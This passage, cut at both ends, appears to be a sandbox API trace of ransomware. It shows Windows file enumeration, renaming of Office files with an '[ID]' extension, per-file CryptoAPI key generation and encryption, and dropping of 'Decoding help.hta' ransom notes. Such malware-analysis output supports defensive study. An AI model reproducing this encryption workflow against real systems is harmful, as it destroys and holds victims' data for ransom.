users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.382] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0041.382] CreateFileMappingA (hFile=0x374, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x370 [0041.382] CryptAcquireContextA (in: phProv=0x4f0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x4f0fcec*=0x3449a40) returned 1 [0043.841] CryptGenKey (in: hProv=0x3449a40, Algid=0x6610, dwFlags=0x1, phKey=0x4f0fce8 | out: phKey=0x4f0fce8*=0x5d84d0) returned 1 [0043.841] CryptExportKey (in: hKey=0x5d84d0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x4f0fbe4, pdwDataLen=0x4f0fce4 | out: pbData=0x4f0fbe4*, pdwDataLen=0x4f0fce4*=0x2c) returned 1 [0043.841] MapViewOfFile (hFileMappingObject=0x370, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x9ed0000 [0044.027] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4f0fbe4*, pdwDataLen=0x4f0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x4f0fbe4*, pdwDataLen=0x4f0fcf8*=0x100) returned 1 [0046.233] CryptEncrypt (in: hKey=0x5d84d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x9ed0000, pdwDataLen=0x4f0fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x9ed0000*, pdwDataLen=0x4f0fce4*=0x100000) returned 1 [0048.187] UnmapViewOfFile (lpBaseAddress=0x9ed0000) returned 1 [0048.370] CloseHandle (hObject=0x370) returned 1 [0048.370] CryptDestroyKey (hKey=0x5d84d0) returned 1 [0048.370] CryptReleaseContext (hProv=0x3449a40, dwFlags=0x0) returned 1 [0048.370] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.370] WriteFile (in: hFile=0x374, lpBuffer=0x4f0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x4f0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4f0fbe4*, lpNumberOfBytesWritten=0x4f0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.036] WriteFile (in: hFile=0x374, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x4f0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x4f0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.036] CloseHandle (hObject=0x374) returned 1 [0051.556] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.276] FindNextFileW (in: hFindFile=0x5d81d0, lpFindFileData=0x4f0fd30 | out: lpFindFileData=0x4f0fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0055.276] lstrcpyW (in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" [0055.276] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0055.276] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Decoding help.hta" [0055.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0055.276] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Office32WW.xml") returned -1 [0055.276] lstrlenW (lpString="Office32WW.xml") returned 14 [0055.276] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" [0055.277] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0055.277] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="Office32WW.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0055.277] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0055.277] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0055.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.430] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0056.430] CreateFileMappingA (hFile=0x3ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x8c4 [0056.430] CryptAcquireContextA (in: phProv=0x4f0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x4f0fcec*=0x344a348) returned 1 [0059.864] CryptGenKey (in: hProv=0x344a348, Algid=0x6610, dwFlags=0x1, phKey=0x4f0fce8 | out: phKey=0x4f0fce8*=0x5da4f8) returned 1 [0059.864] CryptExportKey (in: hKey=0x5da4f8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x4f0fbe4, pdwDataLen=0x4f0fce4 | out: pbData=0x4f0fbe4*, pdwDataLen=0x4f0fce4*=0x2c) returned 1 [0059.864] MapViewOfFile (hFileMappingObject=0x8c4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10a0) returned 0x2d0000 [0059.873] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4f0fbe4*, pdwDataLen=0x4f0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x4f0fbe4*, pdwDataLen=0x4f0fcf8*=0x100) returned 1 [0059.873] CryptEncrypt (in: hKey=0x5da4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0x4f0fce4*=0x10a0, dwBufLen=0x10a0 | out: pbData=0x2d0000*, pdwDataLen=0x4f0fce4*=0x10a0) returned 1 [0059.873] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0059.875] CloseHandle (hObject=0x8c4) returned 1 [0059.875] CryptDestroyKey (hKey=0x5da4f8) returned 1 [0059.875] CryptReleaseContext (hProv=0x344a348, dwFlags=0x0) returned 1 [0059.875] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.875] WriteFile (in: hFile=0x3ac, lpBuffer=0x4f0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x4f0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4f0fbe4*, lpNumberOfBytesWritten=0x4f0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.299] WriteFile (in: hFile=0x3ac, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x4f0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x4f0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.299] CloseHandle (hObject=0x3ac) returned 1 [0061.300] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.300] FindNextFileW (in: hFindFile=0x5d81d0, lpFindFileData=0x4f0fd30 | out: lpFindFileData=0x4f0fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe57f8e0, ftCreationTime.dwHighDateTime=0x1cbe1cb, ftLastAccessTime.dwLowDateTime=0xfe57f8e0, ftLastAccessTime.dwHighDateTime=0x1cbe1cb, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0061.300] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" [0061.300] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0061.300] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Decoding help.hta" [0061.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0061.300] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ose.exe") returned -1 [0061.300] lstrlenW (lpString="ose.exe") returned 7 [0061.300] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" [0061.300] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0061.300] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpString2="ose.exe" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" [0061.300] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" [0061.300] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0061.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.301] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0061.301] CreateFileMappingA (hFile=0x3ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xaac [0061.301] CryptAcquireContextA (phProv=0x4f0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 147 os_tid = 0x1e8 [0040.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*.*", lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7d90 [0041.904] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.904] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.904] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.904] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB60COR", cAlternateFileName="")) returned 1 [0041.904] lstrcmpW (lpString1=".", lpString2="PUB60COR") returned -1 [0041.904] lstrcmpW (lpString1="..", lpString2="PUB60COR") returned -1 [0041.904] lstrcmpiW (lpString1="windows", lpString2="PUB60COR") returned 1 [0041.904] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*.*" [0041.904] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*.*") returned 49 [0041.904] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\", lpString2="PUB60COR" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" [0041.904] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*.*" [0041.904] GlobalMemoryStatus (in: lpBuffer=0x504fd10 | out: lpBuffer=0x504fd10) [0041.904] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9689f58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x49c [0041.905] CloseHandle (hObject=0x49c) returned 1 [0041.905] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0041.905] lstrcmpW (lpString1=".", lpString2="Publisher") returned -1 [0041.905] lstrcmpW (lpString1="..", lpString2="Publisher") returned -1 [0041.905] lstrcmpiW (lpString1="windows", lpString2="Publisher") returned 1 [0041.907] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*.*" [0041.907] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*.*") returned 49 [0041.907] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\", lpString2="Publisher" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher" [0041.907] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\*.*" [0041.907] GlobalMemoryStatus (in: lpBuffer=0x504fd10 | out: lpBuffer=0x504fd10) [0041.908] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11424f18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x49c [0041.908] CloseHandle (hObject=0x49c) returned 1 [0041.908] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 0 [0041.908] FindClose (in: hFindFile=0x5d7d90 | out: hFindFile=0x5d7d90) returned 1 Thread: id = 148 os_tid = 0x7f0 [0040.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0xc7cfd30 | out: lpFindFileData=0xc7cfd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5cb0 [0041.753] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.753] FindNextFileW (in: hFindFile=0x5a5cb0, lpFindFileData=0xc7cfd30 | out: lpFindFileData=0xc7cfd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.753] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.753] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.753] FindNextFileW (in: hFindFile=0x5a5cb0, lpFindFileData=0xc7cfd30 | out: lpFindFileData=0xc7cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0041.753] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" [0041.753] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.753] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.754] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x29c [0041.987] WriteFile (in: hFile=0x29c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xc7cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xc7cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.988] CloseHandle (hObject=0x29c) returned 1 [0041.989] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.989] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Office32WW.msi") returned -1 [0041.989] lstrlenW (lpString="Office32WW.msi") returned 14 [0041.989] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" [0041.989] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.989] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All 